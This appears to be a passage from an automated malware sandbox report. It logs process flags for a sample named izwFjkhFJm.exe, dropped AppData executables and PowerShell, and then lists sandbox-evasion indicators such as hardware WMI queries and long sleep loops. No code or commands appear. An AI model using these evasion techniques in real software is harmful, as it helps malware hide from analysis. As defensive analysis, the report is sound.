              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\izwFjkhFJm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 2056 Thread sleep time: -23058430092136925s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 1304 Thread sleep count: 9668 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232 Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5364 Thread sleep count: 9210 > 30
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1200000s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1199812s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1199514s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1199359s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1199233s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1199106s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1198966s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1198812s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1198685s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1198451s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1198312s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1198185s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1198062s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1197936s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1197810s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1197656s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1197492s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1197250s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1196906s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1196703s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1196562s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1196405s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1196247s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1196109s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195997s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195874s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195765s >= -30000s
